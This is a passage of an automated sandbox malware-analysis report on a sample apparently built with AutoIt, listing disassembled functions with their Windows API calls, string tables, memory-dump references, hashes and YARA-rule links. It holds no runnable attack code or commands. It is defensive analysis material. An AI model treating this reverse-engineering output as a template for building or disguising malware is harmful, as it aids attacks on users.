                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                  • API String ID: 2211948467-2373415609
                                                                                                                  • Opcode ID: 09c6c6fbaab04db27e2cfc87cd0204661eb98c82040d9b896cf832178127dcb1
                                                                                                                  • Instruction ID: 4b456a9449091dc255d958710131ed8de691f677e593f3f7ce8045ee22d34939
                                                                                                                  • Opcode Fuzzy Hash: 09c6c6fbaab04db27e2cfc87cd0204661eb98c82040d9b896cf832178127dcb1
                                                                                                                  • Instruction Fuzzy Hash: 32029B75A00204EFDB14DFA5DC89EAE7BB9FF49350F148158F915AB2A0CBB0AD45CB60
                                                                                                                  Function 00E4D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00E4D2DB
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00E4D30C
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00E4D318
                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 00E4D332
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00E4D341
                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00E4D36C
                                                                                                                  • GetSysColor.USER32(00000010), ref: 00E4D374
                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00E4D37B
                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 00E4D38A
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00E4D391
                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00E4D3DC
                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 00E4D40E
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00E4D439
                                                                                                                    • Part of subcall function 00E4D575: GetSysColor.USER32(00000012), ref: 00E4D5AE
                                                                                                                    • Part of subcall function 00E4D575: SetTextColor.GDI32(?,?), ref: 00E4D5B2
                                                                                                                    • Part of subcall function 00E4D575: GetSysColorBrush.USER32(0000000F), ref: 00E4D5C8
                                                                                                                    • Part of subcall function 00E4D575: GetSysColor.USER32(0000000F), ref: 00E4D5D3
                                                                                                                    • Part of subcall function 00E4D575: GetSysColor.USER32(00000011), ref: 00E4D5F0
                                                                                                                    • Part of subcall function 00E4D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E4D5FE
                                                                                                                    • Part of subcall function 00E4D575: SelectObject.GDI32(?,00000000), ref: 00E4D60F
                                                                                                                    • Part of subcall function 00E4D575: SetBkColor.GDI32(?,00000000), ref: 00E4D618
                                                                                                                    • Part of subcall function 00E4D575: SelectObject.GDI32(?,?), ref: 00E4D625
                                                                                                                    • Part of subcall function 00E4D575: InflateRect.USER32(?,000000FF,000000FF), ref: 00E4D644
                                                                                                                    • Part of subcall function 00E4D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E4D65B
                                                                                                                    • Part of subcall function 00E4D575: GetWindowLongW.USER32(00000000,000000F0), ref: 00E4D670
                                                                                                                    • Part of subcall function 00E4D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E4D698
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3521893082-0
                                                                                                                  • Opcode ID: 6bab5f8ca1735509fb1f19cf448452aee5b0d447b18069dc41d3228434a72e9b
                                                                                                                  • Instruction ID: c2889da29472458cd06fd810858ce14562b5583d9a34f6f4bf158e7f23489590
                                                                                                                  • Opcode Fuzzy Hash: 6bab5f8ca1735509fb1f19cf448452aee5b0d447b18069dc41d3228434a72e9b
                                                                                                                  • Instruction Fuzzy Hash: B091BF7190C305FFC7109F65EC08A6B7BA9FF89364F501A19F962A61E0C7B1D948CB52
                                                                                                                  Function 00E2DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00E2DBD6
                                                                                                                  • GetDriveTypeW.KERNEL32(?,00E7DC54,?,\\.\,00E7DC00), ref: 00E2DCC3
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00E7DC54,?,\\.\,00E7DC00), ref: 00E2DE29
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                  • Opcode ID: 31ee21c95b7f2f1dfb2517430f77f41de54f80deb298bb6391808ec341d33cf6
                                                                                                                  • Instruction ID: 08b4194179e65906f58a973b1ff160e3c404cdde27af8a47b9462a39cb25e177
                                                                                                                  • Opcode Fuzzy Hash: 31ee21c95b7f2f1dfb2517430f77f41de54f80deb298bb6391808ec341d33cf6
                                                                                                                  • Instruction Fuzzy Hash: 5351C63020CB52AFCB10EF24EC82869B7A1FB94749B247A19F247B72A1DB60DD45D752
                                                                                                                  Function 00DECC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsnicmp
                                                                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                  • API String ID: 1038674560-86951937
                                                                                                                  • Opcode ID: 41d474a389ffcdf04729b69cec124aa511d6f8d50d0c77695012bf88ee3d0234
                                                                                                                  • Instruction ID: 335dd9c1bf446dd05b928c040f18ba9bb40c9f9ff77b5c6ec9a3f8be6b98805d
                                                                                                                  • Opcode Fuzzy Hash: 41d474a389ffcdf04729b69cec124aa511d6f8d50d0c77695012bf88ee3d0234
                                                                                                                  • Instruction Fuzzy Hash: DF81F9306403456BCB25BB65DC43FBA37A8EF15305F04A028FE057A1C2EB61DA56C2B1
                                                                                                                  Function 00DFB8FD Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32 ref: 00DFB98B
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00DFB9CD
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00DFB9D8
                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00DFB9E3
                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00DFB9EE
                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E5D2AA
                                                                                                                  • 6F760200.COMCTL32(?,000000FF,?), ref: 00E5D2E3
                                                                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00E5D711
                                                                                                                    • Part of subcall function 00DFB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DFB759,?,00000000,?,?,?,?,00DFB72B,00000000,?), ref: 00DFBA58
                                                                                                                  • SendMessageW.USER32 ref: 00E5D758
                                                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E5D76F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DestroyMessageSendWindow$DeleteObject$CursorF760200InvalidateMoveRect
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 904983628-4108050209
                                                                                                                  • Opcode ID: 1bc4e554c25b7a0c8f75bc6ec6979573943000784ec94c3ba8c87445aedfb82d
                                                                                                                  • Instruction ID: db63be44607ae7522542cc5feba4a0fb3ea435595fb2f80921ff9559213f24c0
                                                                                                                  • Opcode Fuzzy Hash: 1bc4e554c25b7a0c8f75bc6ec6979573943000784ec94c3ba8c87445aedfb82d
                                                                                                                  • Instruction Fuzzy Hash: 8A12A230608205DFDB21CF14C884BA9BBE5FF0431AF54996AEA89EB251C771EC49CF61
                                                                                                                  Function 00E4C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00E4C788
                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00E4C83E
                                                                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 00E4C859
                                                                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00E4CB15
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 2326795674-4108050209
                                                                                                                  • Opcode ID: 6f238130128234c28ed8b85941f48d52fb0661cb5a8bae3946d48985bbd3bb11
                                                                                                                  • Instruction ID: b071e476d9a971e37535e5eeb43cbc09cb07f806b971bf73972320628c867d4d
                                                                                                                  • Opcode Fuzzy Hash: 6f238130128234c28ed8b85941f48d52fb0661cb5a8bae3946d48985bbd3bb11
                                                                                                                  • Instruction Fuzzy Hash: F6F1F37060A300AFD7518F24EC85BAABBE4FF49358F241919F589F72A1C774D844DB92
                                                                                                                  Function 00E4638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?,00E7DC00), ref: 00E46449
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharUpper
                                                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                  • API String ID: 3964851224-45149045
                                                                                                                  • Opcode ID: 050e6aed128317219f06b1f01befed4cd82c134e2760616c334eeea7c93ad06e
                                                                                                                  • Instruction ID: 37ec11a416d2764460ae2b67bc13211520cea6a327696163bbc0fc21e10c2baf
                                                                                                                  • Opcode Fuzzy Hash: 050e6aed128317219f06b1f01befed4cd82c134e2760616c334eeea7c93ad06e
                                                                                                                  • Instruction Fuzzy Hash: 62C195702042458BCB04EF10D551ABE77E6EF96348F059869F9467B3E2DB20ED4BCB62
                                                                                                                  Function 00E4D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetSysColor.USER32(00000012), ref: 00E4D5AE
                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00E4D5B2
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00E4D5C8
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00E4D5D3
                                                                                                                  • CreateSolidBrush.GDI32(?), ref: 00E4D5D8
                                                                                                                  • GetSysColor.USER32(00000011), ref: 00E4D5F0
                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E4D5FE
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00E4D60F
                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00E4D618
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00E4D625
                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00E4D644
                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E4D65B
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00E4D670
                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E4D698
                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E4D6BF
                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00E4D6DD
                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 00E4D6E8
                                                                                                                  • GetSysColor.USER32(00000011), ref: 00E4D6F6
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00E4D6FE
                                                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E4D712
                                                                                                                  • SelectObject.GDI32(?,00E4D2A5), ref: 00E4D729
                                                                                                                  • DeleteObject.GDI32(?), ref: 00E4D734
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00E4D73A
                                                                                                                  • DeleteObject.GDI32(?), ref: 00E4D73F
                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00E4D745
                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00E4D74F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1996641542-0
                                                                                                                  • Opcode ID: 0fc7e0047e04cb28892f6743411470809285e94d077819baa4e547b8f61dc0dc
                                                                                                                  • Instruction ID: 8f4ff1b1bb570c04e9856584288b6cba83bcd0273c8c431e552ca4dc920791bd
                                                                                                                  • Opcode Fuzzy Hash: 0fc7e0047e04cb28892f6743411470809285e94d077819baa4e547b8f61dc0dc
                                                                                                                  • Instruction Fuzzy Hash: F5516A71E05208EFDF109FA9EC48AAE7B79EF09364F114115FA15BB2A0D7B59A00CB60
                                                                                                                  Function 00E4B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E4B7B0
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E4B7C1
                                                                                                                  • CharNextW.USER32(0000014E), ref: 00E4B7F0
                                                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E4B831
                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E4B847
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E4B858
                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00E4B875
                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00E4B8C7
                                                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00E4B8DD
                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E4B90E
                                                                                                                  • _memset.LIBCMT ref: 00E4B933
                                                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00E4B97C
                                                                                                                  • _memset.LIBCMT ref: 00E4B9DB
                                                                                                                  • SendMessageW.USER32 ref: 00E4BA05
                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E4BA5D
                                                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00E4BB0A
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00E4BB2C
                                                                                                                  • GetMenuItemInfoW.USER32(?), ref: 00E4BB76
                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E4BBA3
                                                                                                                  • DrawMenuBar.USER32(?), ref: 00E4BBB2
                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00E4BBDA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 1073566785-4108050209
                                                                                                                  • Opcode ID: 7218a6a4be048534c8bf00008cbfe421d4ac12786a9c9489211f7031af208eed
                                                                                                                  • Instruction ID: 305817b3950c0ee68f846a38e071c2909d87660252b75c071a2131fba2b2b314
                                                                                                                  • Opcode Fuzzy Hash: 7218a6a4be048534c8bf00008cbfe421d4ac12786a9c9489211f7031af208eed
                                                                                                                  • Instruction Fuzzy Hash: 55E1AE70900218AFDB20CF66EC84AEE7BB8FF45754F109156FA19BA290D770CA85DF60
                                                                                                                  Function 00DE2EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Foreground
                                                                                                                  • String ID: ACTIVE$ALL$CLASS$H+$HANDLE$INSTANCE$L+$LAST$P+$REGEXPCLASS$REGEXPTITLE$T+$TITLE
                                                                                                                  • API String ID: 62970417-993842312
                                                                                                                  • Opcode ID: 6ebd5d5eb2513a392ded870f2fe6b989cc7a8da28eb7570c6b5c4f9216f201a7
                                                                                                                  • Instruction ID: 5b4219bfe58f63dce413b6120f66359c162b4f2c4751c17d312c24c1a43783de
                                                                                                                  • Opcode Fuzzy Hash: 6ebd5d5eb2513a392ded870f2fe6b989cc7a8da28eb7570c6b5c4f9216f201a7
                                                                                                                  • Instruction Fuzzy Hash: 85D1D830508646ABCB04EF11C8419AABBB4FF55344F049D2DFA56771A1DB30E99ECBB1
                                                                                                                  Function 00E4764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCursorPos.USER32(?), ref: 00E4778A
                                                                                                                  • GetDesktopWindow.USER32 ref: 00E4779F
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00E477A6
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00E47808
                                                                                                                  • DestroyWindow.USER32(?), ref: 00E47834
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E4785D
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E4787B
                                                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00E478A1
                                                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00E478B6
